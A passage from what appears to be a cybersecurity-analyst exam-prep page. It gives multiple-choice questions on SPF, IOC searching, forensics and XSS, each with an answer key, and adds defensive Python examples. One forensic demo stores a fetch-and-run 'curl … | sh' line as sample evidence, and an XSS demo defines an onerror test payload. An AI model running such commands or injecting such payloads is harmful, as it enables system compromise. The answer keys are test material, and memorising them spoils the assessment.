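def parse_cymru_txt(txt):
    """Parse the TXT answer 'ASN | prefix | CC | registry | allocated' into a dict."""
    fields = [f.strip() for f in txt.strip().strip('"').split("|")]
    if len(fields) != 5:
        raise ValueError(f"unexpected Cymru answer: {txt!r}")
    asn, prefix, cc, registry, allocated = fields
    return {"asn": asn, "prefix": prefix, "cc": cc, "registry": registry, "allocated": allocated}

GEOIP_RE = re.compile(r"^GeoIP Country Edition:\s*([A-Z]{2}),\s*(.+)$")

def parse_geoiplookup(line):
    """Parse the one-line geoiplookup output from Question 68 into (country_code, country_name)."""
    m = GEOIP_RE.match(line.strip())
    if not m:
        raise ValueError(f"unexpected geoiplookup output: {line!r}")
    return m.group(1), m.group(2)

def group_by(items, key):
    """items: iterable of (ip, parsed_value). Returns {key(parsed_value): [ip, ...]}."""
    groups = defaultdict(list)
    for ip, value in items:
        groups[key(value)].append(ip)
    return dict(groups)

# Constructed answers: RFC 5737 documentation ranges and an RFC 5398 private-use ASN.
CYMRU_ANSWERS = {
    "192.0.2.10":   '"64496 | 192.0.2.0/24 | US | arin | 2020-01-15"',
    "192.0.2.200":  '"64496 | 192.0.2.0/24 | US | arin | 2020-01-15"',
    "198.51.100.7": '"64497 | 198.51.100.0/24 | DE | ripencc | 2019-06-02"',
}
GEOIP_ANSWERS = {
    "192.0.2.10":   "GeoIP Country Edition: US, United States",
    "192.0.2.200":  "GeoIP Country Edition: US, United States",
    "198.51.100.7": "GeoIP Country Edition: DE, Germany",
}

def by_asn(answers=CYMRU_ANSWERS):
    """Question 67: addresses that share an ASN belong to the same network operator."""
    return group_by(((ip, parse_cymru_txt(t)) for ip, t in answers.items()), key=lambda v: v["asn"])

def by_country(answers=GEOIP_ANSWERS):
    """Question 68: addresses grouped by the country code geoiplookup reported."""
    return group_by(((ip, parse_geoiplookup(t)) for ip, t in answers.items()), key=lambda v: v[0])

if __name__ == "__main__":
    print(cymru_query_name("192.0.2.10"))
    print(by_asn())
    print(by_country())
```

In a live script the values in CYMRU_ANSWERS would come from `dig <name> TXT +short` and those in GEOIP_ANSWERS from `geoiplookup <ip>`; everything else stays the same.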

Question #69

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:

Which of the following should be completed first to remediate the findings?

  • A . Ask the web development team to update the page contents
  • B . Add the IP address allow listing for control panel access
  • C . Purchase an appropriate certificate from a trusted root CA
  • D . Perform proper sanitization on all fields

Correct Answer: D

Explanation:

The first action that should be completed to remediate the findings is to perform proper sanitization on all fields. Sanitization is a process that involves validating, filtering, or encoding any user input or data before processing or storing it on a system or application. Sanitization can help prevent various types of attacks, such as cross-site scripting (XSS), SQL injection, or command injection, that exploit unsanitized input or data to execute malicious scripts, commands, or queries on a system or application. Performing proper sanitization on all fields can help address the most critical and common vulnerability found during the vulnerability assessment, which is XSS.

Question #70

A user reports a malware alert to the help desk. A technician verifies the alert, determines the workstation is classified as a low-severity device, and uses network controls to block access. The technician then assigns the ticket to a security analyst who will complete the eradication and recovery processes.

Which of the following should the security analyst do next?

  • A . Document the procedures and walk through the incident training guide.
  • B . Reverse engineer the malware to determine its purpose and risk to the organization.
  • C . Sanitize the workstation and verify countermeasures are restored.
  • D . Isolate the workstation and issue a new computer to the user.

Correct Answer: C

Explanation:

Sanitizing the workstation and verifying countermeasures are restored are part of the eradication and recovery processes that the security analyst should perform next. Eradication is the process of removing malware or other threats from the affected systems, while recovery is the process of restoring normal operations and functionality to the affected systems. Sanitizing the workstation can involve deleting or wiping any malicious files or programs, while verifying countermeasures are restored can involve checking and updating any security controls or settings that may have been compromised.

Reference: https://www.cynet.com/incident-response/incident-response-sans-the-6-steps-in-depth/

Question #71

A digital forensics investigator works from duplicate images to preserve the integrity of the original evidence.

Which of the following types of media are most volatile and should be preserved? (Select two).

  • A . Memory cache
  • B . Registry file
  • C . SSD storage
  • D . Temporary filesystems
  • E . Packet decoding
  • F . Swap volume

Correct Answer: AD

Explanation:

Memory cache and temporary filesystems (A and D) are the most volatile media in the list and must be preserved first. The order of volatility described in RFC 3227 runs from CPU registers and cache, through running memory, process and network state, to temporary file systems, then fixed disk, and finally remote logs and archival media. Cache and RAM-backed temporary filesystems lose their contents as soon as the machine loses power or reboots. The registry files and the swap volume live on persistent storage and SSD storage is the disk itself, so all three rank lower; packet decoding is an analysis activity, not a type of media.

Reference: https://www.techopedia.com/definition/10339/memory-dump

Question #72

A development team recently released a new version of a public-facing website for testing prior to production. The development team is soliciting the help of various teams to validate the functionality of the website due to its high visibility.

Which of the following activities best describes the process the development team is initiating?

  • A . Static analysis
  • B . Stress testing
  • C . Code review
  • D . User acceptance testing

Correct Answer: D

Explanation:

User acceptance testing is a process of verifying that a software application meets the requirements and expectations of the end users before it is released to production. User acceptance testing can help to validate the functionality, usability, performance and compatibility of the software application with real-world scenarios and feedback. User acceptance testing can involve various teams, such as developers, testers, customers and stakeholders.

Reference: https://www.techopedia.com/definition/3887/user-acceptance-testing-uat

Question #73

A security technician is testing a solution that will prevent outside entities from spoofing the company's email domain, which is comptia.org. The testing is successful, and the security technician is prepared to fully implement the solution.

Which of the following actions should the technician take to accomplish this task?

  • A . Add TXT @ "v=spf1 mx include:_spf.comptia.org -all" to the DNS record.
  • B . Add TXT @ "v=spf1 mx include:_spf.comptia.org -all" to the email server.
  • C . Add TXT @ "v=spf1 mx include:_spf.comptia.org +all" to the domain controller.
  • D . Add TXT @ "v=spf1 mx include:_spf.comptia.org +all" to the web server.

Correct Answer: A

Explanation:

Adding TXT @ "v=spf1 mx include:_spf.comptia.org -all" to the DNS zone for comptia.org publishes a Sender Policy Framework (SPF) record, which is what prevents outside entities from spoofing the domain. SPF is a DNS-based control: a receiving mail server looks up the TXT record of the domain in the envelope sender, checks whether the connecting IP address is covered by the listed mechanisms (here the domain's MX hosts and whatever the _spf.comptia.org record includes) and applies the qualifier of the first mechanism that matches. The trailing "-all" means every other host fails the check. Options B, C and D are wrong either because they place the record on a system that does not answer DNS for the domain (the email server, a domain controller, a web server) or because "+all" would authorize every host on the Internet to send as comptia.org. SPF only covers the envelope sender; DKIM and DMARC are needed to protect the visible From: header as well.

Reference: https://www.cloudflare.com/learning/ssl/what-is-domain-spoofing/
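An added example, not code from the page, showing what a receiving server does with that record and why "+all" is a mistake: a minimal SPF evaluator in the spirit of RFC 7208, run against a constructed zone so it works offline. The comptia.org and weak.example records below are assumptions for illustration, not the real domain's DNS data.

```python
import ipaddress

# Added example, not from the page. FAKE_DNS stands in for live lookups; every record is constructed.
FAKE_DNS = {
    ("comptia.org", "TXT"):      ["v=spf1 mx include:_spf.comptia.org -all"],
    ("comptia.org", "MX"):       ["mail1.comptia.org"],
    ("mail1.comptia.org", "A"):  ["198.51.100.10"],
    ("_spf.comptia.org", "TXT"): ["v=spf1 ip4:203.0.113.0/24 -all"],
    ("weak.example", "TXT"):     ["v=spf1 mx +all"],          # the mistake in options C and D
    ("weak.example", "MX"):      ["mail.weak.example"],
    ("mail.weak.example", "A"):  ["192.0.2.25"],
}
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

def resolve(name, rtype):
    return FAKE_DNS.get((name.lower(), rtype), [])

def get_spf(domain):
    for txt in resolve(domain, "TXT"):
        if txt.lower().startswith("v=spf1"):
            return txt
    return None

def check_spf(domain, sender_ip, depth=0):
    """Result a receiving MTA would reach for sender_ip claiming MAIL FROM <...@domain>."""
    if depth > 10:
        return "permerror"              # include loops / too many lookups
    record = get_spf(domain)
    if record is None:
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"                 # a mechanism without a qualifier means pass
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            matched = True
        elif name in ("ip4", "ip6"):
            matched = ip in ipaddress.ip_network(arg, strict=False)
        elif name == "a":
            matched = sender_ip in resolve(arg or domain, "A")
        elif name == "mx":
            matched = any(sender_ip in resolve(mx, "A") for mx in resolve(arg or domain, "MX"))
        elif name == "include":
            matched = check_spf(arg, sender_ip, depth + 1) == "pass"
        else:
            return "permerror"          # exists, ptr, redirect= and macros are not handled here
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"                    # no 'all' term: the RFC default

def spf_record_problems(record):
    """Static checks to run before publishing; the kind of review that catches '+all'."""
    problems = []
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["record must start with v=spf1"]
    last = terms[-1].lower()
    if last in ("all", "+all"):
        problems.append("'+all' authorizes every host on the Internet to send as this domain; use -all or ~all")
    elif last not in ("-all", "~all", "?all"):
        problems.append("record does not end with an 'all' mechanism")
    lookups = sum(1 for t in terms[1:]
                  if t.lstrip("+-~?").split(":")[0].lower() in ("a", "mx", "include", "exists", "ptr")
                  or t.lower().startswith("redirect="))
    if lookups > 10:
        problems.append(f"{lookups} DNS-lookup mechanisms exceed the limit of 10")
    return problems

if __name__ == "__main__":
    for ip in ("198.51.100.10", "203.0.113.7", "192.0.2.1"):
        print(ip, check_spf("comptia.org", ip))
    print(spf_record_problems("v=spf1 mx include:_spf.comptia.org +all"))
```

Run against the constructed zone, the MX host and the included ip4 range pass, an unrelated address fails, and any address at all passes for weak.example, which is exactly the spoofing the technician is trying to stop.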

Question #74

A security analyst who works in the SOC receives a new requirement to monitor for indicators of compromise.

Which of the following is the first action the analyst should take in this situation?

  • A . Develop a dashboard to track the indicators of compromise.
  • B . Develop a query to search for the indicators of compromise.
  • C . Develop a new signature to alert on the indicators of compromise.
  • D . Develop a new signature to block the indicators of compromise.

Correct Answer: B

Explanation:

Developing a query to search for the indicators of compromise is the first action the analyst should take in this situation. Indicators of compromise (IOCs) are pieces of information that suggest a system or network has been compromised by an attacker. IOCs can include IP addresses, domain names, file hashes, URLs, or other artifacts that are associated with malicious activity. Developing a query to search for IOCs can help to identify any potential incidents or threats in the environment and initiate further investigation or response.

Reference: https://www.crowdstrike.com/cybersecurity-101/incident-response/indicators-of-compromise/
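The query the analyst writes depends on the SIEM, but the logic underneath it is the same everywhere: extract the candidate artifacts from each event, normalize them, and compare them with the IOC list. The following added example, not code from the page, does that in plain Python over three constructed log lines so the matching rules are visible: IP addresses are matched with boundaries so 203.0.113.4 does not hit on 203.0.113.45, domains match exactly or as subdomains rather than by substring, and hashes compare case-insensitively. Field names, IOC values and the log format are all made up.

```python
import re

# Added example, not from the page. IOCs and log lines are constructed (documentation IPs,
# example domains, a placeholder hash); the field layout imitates a proxy log and an EDR log.
IOCS = {
    "ip": {"203.0.113.45"},
    "domain": {"update-check.example.net"},
    "sha256": {"0123456789abcdef" * 4},
}
LOG_LINES = [
    "2024-03-01T10:15:02Z proxy src=10.0.0.23 dst=203.0.113.45 host=cdn.update-check.example.net url=/a.php status=200",
    "2024-03-01T10:15:09Z proxy src=10.0.0.31 dst=198.51.100.7 host=www.example.org url=/ status=200",
    "2024-03-01T10:16:40Z edr host=WS-0042 file=C:\\Users\\a\\AppData\\Local\\Temp\\svc.exe "
    "sha256=0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF",
]

IP_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)

def normalize(iocs):
    """Lower-case domains and hashes once so every comparison is case-insensitive."""
    return {
        "ip": set(iocs.get("ip", ())),
        "domain": {d.lower().rstrip(".") for d in iocs.get("domain", ())},
        "sha256": {h.lower() for h in iocs.get("sha256", ())},
    }

def domain_hit(host, domains):
    """A host matches an IOC domain exactly or as one of its subdomains, never by substring."""
    host = host.lower().rstrip(".")
    for d in domains:
        if host == d or host.endswith("." + d):
            return d
    return None

def search_iocs(lines, iocs):
    """Return sorted, de-duplicated (line_number, ioc_type, ioc_value) hits; line numbers start at 1."""
    iocs = normalize(iocs)
    hits = set()
    for n, line in enumerate(lines, start=1):
        for ip in IP_RE.findall(line):
            if ip in iocs["ip"]:
                hits.add((n, "ip", ip))
        for host in HOST_RE.findall(line):
            d = domain_hit(host, iocs["domain"])
            if d:
                hits.add((n, "domain", d))
        for h in SHA256_RE.findall(line):
            if h.lower() in iocs["sha256"]:
                hits.add((n, "sha256", h.lower()))
    return sorted(hits)

if __name__ == "__main__":
    for hit in search_iocs(LOG_LINES, IOCS):
        print(hit)
```

Once the search confirms there are hits, the same matching rules become the alert signature (option C) and, if the confidence is high enough, the block rule (option D); the dashboard (option A) comes last, as a view over data the query has already produced.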

Question #75

During an investigation, an analyst discovers the following rule in an executive’s email client:

The executive is not aware of this rule.

Which of the following should the analyst do first to evaluate the potential impact of this security incident?

  • A . Check the server logs to evaluate which emails were sent to <someaddress@domain.com>.
  • B . Use the SIEM to correlate logging events from the email server and the domain server.
  • C . Remove the rule from the email client and change the password.
  • D . Recommend that the management team implement SPF and DKIM.

Correct Answer: A

Explanation:

Checking the server logs to evaluate which emails were sent to <someaddress@domain.com> is the first action the analyst should take to evaluate the potential impact of this security incident. A mailbox rule the owner did not create, forwarding mail to an outside address, is a common way an attacker who has obtained the credentials keeps receiving a victim's mail. The mail server's message tracking logs record every delivery, so they show how many messages went to <someaddress@domain.com>, when the forwarding started, and which messages and attachments were involved; that sizes the exposure and tells the analyst whether other mailboxes have similar rules. Removing the rule and changing the password (C) is the containment step and follows the impact assessment; SIEM correlation with the domain server (B) helps later to find the logon that created the rule; SPF and DKIM (D) address inbound spoofing, not an existing rule in a mailbox.

Reference: https://www.techopedia.com/definition/1308/server-log

Question #76

A security analyst is investigating a compromised Linux server.

The analyst issues the ps command and receives the following output:

Which of the following commands should the administrator run next to further analyze the compromised system?

  • A . gdb /proc/1301
  • B . rpm -V openssh-server
  • C . /bin/ls -l /proc/1301/exe
  • D . kill -9 1301

Correct Answer: C

Explanation:

/bin/ls -l /proc/1301/exe prints the target of the exe symbolic link, which the kernel maintains for every process and which points at the file that was actually executed to start PID 1301, in this case /usr/sbin/sshd. The ps output only shows what the process reports about itself (a process can rewrite its own command line), so resolving the link tells the analyst whether the process labelled sshd really runs the packaged binary or a file dropped somewhere else; a trailing "(deleted)" marker means the executable was removed or replaced on disk after the process started, which is itself an indicator of compromise. Once the path is known, rpm -V openssh-server (option B) is the natural follow-up to verify the package's files on disk. gdb /proc/1301 (option A) would not attach to the process (gdb -p 1301 would) and debugging alters process state, and kill -9 (option D) destroys the evidence before it has been examined.

Reference: https://unix.stackexchange.com/questions/197854/how-does-the-proc-pid-exe-symlink-differ-from-ordinary-symlinks
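As an added example, not code from the page, the checks an analyst applies to what the exe link resolves to, written as a reusable function rather than a one-off ls: the "(deleted)" marker, an executable outside the package-managed directories, and a mismatch between the resolved path and the binary the process claims to be. The trusted directory list is an assumption for a typical RPM-based host; the live inspect_pid() only works on Linux with permission to read /proc for the target PID.

```python
import os

# Added example, not from the page. TRUSTED_DIRS is an assumption for a typical RPM-based host.
TRUSTED_DIRS = ("/usr/sbin/", "/usr/bin/", "/usr/lib/", "/usr/libexec/", "/sbin/", "/bin/")
DELETED = " (deleted)"

def exe_findings(exe_target, expected_path=None):
    """Suspicious properties of an exe link target, in a fixed order.

    exe_target is what os.readlink('/proc/<pid>/exe') returned. expected_path is the
    binary the process claims to be (what ps showed), if the analyst wants it compared.
    """
    findings = []
    path = exe_target
    if path.endswith(DELETED):
        # The kernel appends this when the file was unlinked or replaced after exec: the
        # running code no longer exists on disk, so package verification cannot see it.
        findings.append("binary-deleted-from-disk")
        path = path[: -len(DELETED)]
    if not any(path.startswith(d) for d in TRUSTED_DIRS):
        findings.append("binary-outside-trusted-paths")
    if expected_path is not None and os.path.normpath(path) != os.path.normpath(expected_path):
        # ps prints the command line, which the process itself controls; the exe link is
        # maintained by the kernel, so a difference here is the authoritative answer.
        findings.append("exe-differs-from-expected-path")
    return findings

def inspect_pid(pid, expected_path=None):
    """Resolve the live link for one PID; None when /proc is unavailable or access is denied."""
    try:
        target = os.readlink(f"/proc/{pid}/exe")
    except OSError:
        return None
    return {"pid": pid, "exe": target, "findings": exe_findings(target, expected_path)}

if __name__ == "__main__":
    # On Linux this reports the interpreter running the script; elsewhere it prints None.
    print(inspect_pid(os.getpid()))
```

For the question's scenario the call would be inspect_pid(1301, expected_path="/usr/sbin/sshd"); an empty findings list means the process is running the file ps says it is, and the package check is the next step.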

Question #77

The following output is from a tcpdump at the edge of the corporate network:

Which of the following best describes the potential security concern?

  • A . Payload lengths may be used to overflow buffers enabling code execution.
  • B . Encapsulated traffic may evade security monitoring and defenses
  • C . This traffic exhibits a reconnaissance technique to create network footprints.
  • D . The content of the traffic payload may permit VLAN hopping.

Correct Answer: B

Explanation:

Encapsulated traffic may evade security monitoring and defenses by hiding or obfuscating the actual content or source of the traffic. Encapsulation is a technique that wraps data packets with additional headers or protocols to enable communication across different network types or layers.

Encapsulation can be used for legitimate purposes, such as tunneling, VPNs, or NAT, but it can also be used by attackers to bypass security controls or detection mechanisms that are not able to inspect or analyze the encapsulated traffic.

Question #78

A company’s threat team has been reviewing recent security incidents and looking for a common theme. The team discovered the incidents were caused by incorrect configurations on the impacted systems. The issues were reported to support teams, but no action was taken.

Which of the following is the next step the company should take to ensure any future issues are remediated?

  • A . Require support teams to develop a corrective control that ensures security failures are addressed once they are identified.
  • B . Require support teams to develop a preventive control that ensures new systems are built with the required security configurations.
  • C . Require support teams to develop a detective control that ensures they continuously assess systems for configuration errors.
  • D . Require support teams to develop a managerial control that ensures systems have a documented configuration baseline.

Correct Answer: A

Explanation:

Requiring support teams to develop a corrective control that ensures security failures are addressed once they are identified is the next step the company should take. The review did not reveal a detection gap: the misconfigurations were found and reported. What was missing was follow-through, because nothing guaranteed that a reported issue was actually fixed. Corrective controls are actions or mechanisms applied after a failure or incident has been identified to return the system to its intended state, such as patching, reconfiguring, repairing or restoring the affected components, and a corrective control with tracking to closure is what closes that gap. A preventive control for new builds (B), a detective control that keeps scanning (C) or a documented baseline (D) are all useful, but none of them makes anyone act on a finding that has already been raised.

Question #79

A product manager is working with an analyst to design a new application that will perform as a data analytics platform and will be accessible via a web browser. The product manager suggests using a PaaS provider to host the application.

Which of the following is a security concern when using a PaaS solution?

  • A . The use of infrastructure-as-code capabilities leads to an increased attack surface.
  • B . Patching the underlying application server becomes the responsibility of the client.
  • C . The application is unable to use encryption at the database level.
  • D . Insecure application programming interfaces can lead to data compromise.

Correct Answer: D

Explanation:

Insecure application programming interfaces (APIs) can lead to data compromise when using a PaaS solution. APIs are interfaces that allow applications to communicate with each other and with the underlying platform. APIs can expose sensitive data or functionality to unauthorized or malicious users if they are not properly designed, implemented, or secured. Insecure APIs can result in data breaches, denial of service, unauthorized access, or code injection.

Reference: https://spot.io/resources/cloud-security/paas-security-threats-solutions-and-best-practices/

Question #80

A security analyst performs a weekly vulnerability scan on a network that has 240 devices and receives a report with 2,450 pages.

Which of the following would most likely decrease the number of false positives?

  • A . Manual validation
  • B . Penetration testing
  • C . A known-environment assessment
  • D . Credentialed scanning

Correct Answer: D

Explanation:

Credentialed scanning is a method of vulnerability scanning that uses valid user credentials to log on to the target systems and assess them from the inside rather than from the network alone. Because the scanner can read installed package versions, applied patches, configuration files, registry keys and permissions directly, it no longer has to infer a vulnerability from a service banner or a response fingerprint, which is where many false positives come from (a backported fix that leaves the version string unchanged, for example). Manual validation (A) also removes false positives, but one finding at a time across 2,450 pages; penetration testing (B) and a known-environment assessment (C) answer different questions and do not shrink the scan report.

Reference: https://www.tenable.com/blog/credentialed-vulnerability-scanning-what-why-and-how

Question #81

An organization wants to move non-essential services into a cloud computing environment. The management team has a cost focus and would like to achieve a recovery time objective of 12 hours.

Which of the following cloud recovery strategies would work best to attain the desired outcome?

  • A . Duplicate all services in another instance and load balance between the instances.
  • B . Establish a hot site with active replication to another region within the same cloud provider.
  • C . Set up a warm disaster recovery site with the same cloud provider in a different region.
  • D . Configure the systems with a cold site at another cloud provider that can be used for failover.

Correct Answer: C

Explanation:

Setting up a warm disaster recovery site with the same cloud provider in a different region can help to achieve a recovery time objective (RTO) of 12 hours while keeping the costs low. A warm disaster recovery site is a partially configured site that has some of the essential hardware and software components ready to be activated in case of a disaster. A warm site can provide faster recovery than a cold site, which has no preconfigured components, but at lower cost than a hot site, which has fully configured and replicated components. Using the same cloud provider simplifies the migration and synchronization processes, while using a different region avoids regional outages or disasters.

Question #82

A security analyst discovers the company’s website is vulnerable to cross-site scripting.

Which of the following solutions will best remedy the vulnerability?

  • A . Prepared statements
  • B . Server-side input validation
  • C . Client-side input encoding
  • D . Disabled JavaScript filtering

Correct Answer: B

Explanation:

Server-side input validation is a solution that can prevent cross-site scripting (XSS) vulnerabilities by checking and filtering any user input that is sent to the server before it is stored or rendered on a web page. Server-side input validation can help to ensure that the user input conforms to the expected format, length and type, and does not contain any characters or syntax that may alter the logic or behavior of the page; input that does not meet the validation criteria is rejected or sanitized. Contextual output encoding at render time is the complementary control, because free-text fields legitimately contain characters such as "<" that validation cannot simply reject. Client-side encoding or validation (C) can be bypassed by anyone who sends requests to the server directly, and prepared statements (A) address SQL injection, not XSS.

Reference: https://portswigger.net/web-security/cross-site-scripting/preventing
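As an added example, not code from the page, a vulnerable rendering function beside the two server-side layers that fix it. The username field has a known shape, so allow-list validation can reject the payload outright; a free-text comment cannot be validated that way, so output encoding for the HTML context (html.escape) carries the load there. Function and field names are assumptions.

```python
import html
import re

# Added example, not from the page. The payload and field names are constructed for illustration.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

def validate_username(value):
    """Allow-list validation: anything that is not a plausible username is rejected.
    This works for fields with a known shape; a free-text comment cannot be validated this way."""
    return bool(USERNAME_RE.match(value))

def render_greeting_unsafe(username):
    # The vulnerable pattern: untrusted input concatenated straight into HTML.
    return f"<h1>Welcome, {username}!</h1>"

def render_greeting(username):
    """Validated on the server, then encoded anyway for the HTML context it lands in."""
    if not validate_username(username):
        raise ValueError("invalid username")
    return f"<h1>Welcome, {html.escape(username)}!</h1>"

def render_comment(text):
    """Free text cannot be rejected for containing '<', so output encoding does the work:
    the browser receives the characters as text, not as markup."""
    return f"<p>{html.escape(text, quote=True)}</p>"

PAYLOAD = '<img src=x onerror="alert(1)">'   # constructed reflected-XSS test payload

if __name__ == "__main__":
    print(render_greeting_unsafe(PAYLOAD))   # a browser would run the onerror handler
    print(render_comment(PAYLOAD))            # a browser shows the literal text
```

The same escaping is not enough for every context: a value placed inside a JavaScript block, a URL or an attribute without quotes needs the encoding appropriate to that context, which is why the control is called contextual output encoding.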

Question #83

An organization supports a large number of remote users.

Which of the following is the best option to protect the data on the remote users’ laptops?

  • A . Require the use of VPNs.
  • B . Require employees to sign an NDA.
  • C . Implement a DLP solution.
  • D . Use whole disk encryption.

Correct Answer: D

Explanation:

Using whole disk encryption is the best option to protect the data on the remote users’ laptops. Whole disk encryption is a technique that encrypts all data on a hard disk drive, including the operating system, applications and files. Whole disk encryption can prevent unauthorized access to the data if the laptop is lost, stolen or compromised. Whole disk encryption can also protect the data from physical attacks, such as removing the hard disk and connecting it to another device.

Question #84

A security analyst is monitoring a company’s network traffic and finds ping requests going to accounting and human resources servers from a SQL server. Upon investigation, the analyst discovers a technician responded to potential network connectivity issues.

Which of the following is the best way for the security analyst to respond?

  • A . Report this activity as a false positive, as the activity is legitimate.
  • B . Isolate the system and begin a forensic investigation to determine what was compromised.
  • C . Recommend network segmentation to the management team as a way to secure the various environments.
  • D . Implement host-based firewalls on all systems to prevent ping sweeps in the future.

Correct Answer: A

Explanation:

Reporting this activity as a false positive, as the activity is legitimate, is the best way for the security analyst to respond. A false positive is a condition in which harmless traffic is classified as a potential network attack by a security monitoring tool. Ping requests are a common network diagnostic tool that can be used to test network connectivity issues. The technician who responded to potential network connectivity issues was performing a legitimate task and did not pose any threat to the accounting and human resources servers.

Question #85

Which of the following software assessment methods would test how an application performs at peak times?

  • A . Security regression testing
  • B . Stress testing
  • C . Static analysis testing
  • D . Dynamic analysis testing
  • E . User acceptance testing

Correct Answer: B

Explanation:

Stress testing is a software assessment method that tests how an application performs under peak times or extreme workloads. Stress testing can help to identify any performance issues, bottlenecks, errors or crashes that may occur when an application faces high demand or concurrent users. Stress testing can also help to determine the maximum capacity and scalability of an application.

Question #86

During an incident response procedure, a security analyst acquired the needed evidence from the hard drive of a compromised machine.

Which of the following actions should the analyst perform next to ensure the data integrity of the evidence?

  • A . Generate hashes for each file from the hard drive.
  • B . Create a chain of custody document.
  • C . Determine a timeline of events using correct time synchronization.
  • D . Keep the cloned hard drive in a safe place.

Correct Answer: A

Explanation:

Generating hashes for each file from the hard drive is the next action the analyst should perform to ensure the data integrity of the evidence. Hashing produces a fixed-length value that is unique in practice to a given input, such as a file or a whole disk image. Comparing the hash of the original with the hash of the working copy verifies integrity: if the values match, the evidence has not been altered or corrupted; if they differ, it has been tampered with or damaged. In practice the analyst hashes the acquired image as a whole as well as the individual files, records the values in the chain-of-custody documentation, and recomputes them whenever the evidence changes hands. Creating the chain-of-custody document (B) records who handled the evidence but cannot by itself show that the bits are unchanged; a timeline (C) and safe storage (D) come after integrity has been established.
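An added example, not code from the page, of the hashing step: stream-hash every file of an acquired tree into a manifest, then re-verify the tree later and report anything that changed, went missing or appeared. The sample evidence files are constructed in a temporary directory, and the file and case names are assumptions. The same sha256_file() function is what you would run once over the whole disk image before anything else touches it.

```python
import hashlib
import os
import tempfile

# Added example, not from the page. demo() builds a constructed evidence tree in a temp directory.

def sha256_file(path, chunk_size=1 << 20):
    """Stream the file so a multi-gigabyte image does not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root):
    """Map every file under root (relative POSIX-style path) to its SHA-256."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest

def verify_manifest(root, manifest):
    """Return {relpath: reason} for every file that no longer agrees with the manifest."""
    current = build_manifest(root)
    problems = {}
    for rel, digest in manifest.items():
        if rel not in current:
            problems[rel] = "missing"
        elif current[rel] != digest:
            problems[rel] = "hash mismatch"
    for rel in current:
        if rel not in manifest:
            problems[rel] = "unexpected file"
    return problems

def write_manifest(manifest, path):
    """sha256sum-compatible format, so 'sha256sum -c' can re-verify it on another system."""
    with open(path, "w") as fh:
        for rel, digest in sorted(manifest.items()):
            fh.write(f"{digest}  {rel}\n")

def demo():
    """Constructed evidence tree: acquire (hash), tamper, re-verify. Returns the verification result."""
    with tempfile.TemporaryDirectory() as root:
        hist = os.path.join(root, "home", "user", ".bash_history")
        os.makedirs(os.path.dirname(hist))
        with open(hist, "w") as fh:
            fh.write("curl http://198.51.100.7/x.sh | sh\n")   # constructed sample content
        with open(os.path.join(root, "notes.txt"), "w") as fh:
            fh.write("case 2024-0042\n")
        manifest = build_manifest(root)
        with open(hist, "w") as fh:
            fh.write("ls\n")                                   # evidence altered after acquisition
        return verify_manifest(root, manifest)

if __name__ == "__main__":
    print(demo())
```

The manifest should be hashed and stored with the chain-of-custody record as well; a manifest that can be rewritten by whoever altered the files proves nothing.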

Question #87

As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack scenarios derived from the available threat intelligence information. After forming the basis of the scenario, which of the following may the threat hunter construct to establish a framework for threat assessment?

  • A . Critical asset list
  • B . Threat vector
  • C . Attack profile
  • D . Hypothesis

Correct Answer: D

Explanation:

A hypothesis is a statement that can be tested by threat hunters to establish a framework for threat assessment. A hypothesis is based on situational awareness and threat intelligence information, and describes a possible attack scenario that may affect the organization. A hypothesis can help to guide threat hunters in their investigation by providing a clear and specific question to answer, such as “Is there any evidence of lateral movement within our network?” or “Are there any signs of data exfiltration from our servers?”.

Reference: https://www.crowdstrike.com/blog/tech-center/threat-hunting-hypothesis-development/

Question #88

A company creates digitally signed packages for its devices.

Which of the following best describes the method by which the security packages are delivered to the company's customers?

  • A . Antitamper mechanism
  • B . SELinux
  • C . Trusted firmware updates
  • D . eFuse

Reveal Solution Hide Solution

Correct Answer: C
C

Explanation:

Trusted firmware updates are a method by which security packages are delivered to the company’s customers. Trusted firmware updates are digitally signed packages that contain software updates or patches for devices, such as routers, switches, or firewalls. Trusted firmware updates can help to ensure the authenticity and integrity of the packages by verifying the digital signature of the sender and preventing unauthorized or malicious modifications to the packages.

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_trustsec/configuration/xe-16/sec-usr-trustsec-xe-16-book/sec-trust-firm-upd.html

Question #89

During an audit, several customer order forms were found to contain inconsistencies between the actual price of an item and the amount charged to the customer. Further investigation narrowed the cause of the issue to manipulation of the public-facing web form used by customers to order products.

Which of the following would be the best way to locate this issue?

  • A . Reduce the session timeout threshold
  • B . Deploy MFA for access to the web server.
  • C . Implement input validation.
  • D . Run a dynamic code analysis.

Reveal Solution Hide Solution

Correct Answer: D
D

Explanation:

Running a dynamic code analysis is the best way to locate this issue. Dynamic analysis exercises the running application with crafted requests, for example resubmitting the order form with a modified price field, and observes how the server responds, so it pinpoints which request parameters the application accepts without server-side checks. The audit already established that the public web form is being manipulated; the open question is where, and a dynamic test reproduces the manipulation against the live form instead of reasoning about it from source. Input validation (option C) is the remediation once the weak parameter is found: it checks that user input conforms to the expected format, length and type and rejects or sanitizes anything else, so a client-supplied price is never trusted. Reducing the session timeout and requiring MFA for access to the web server address session and administrative authentication, not tampering with form data.

Reference: https://portswigger.net/web-security/input-validation
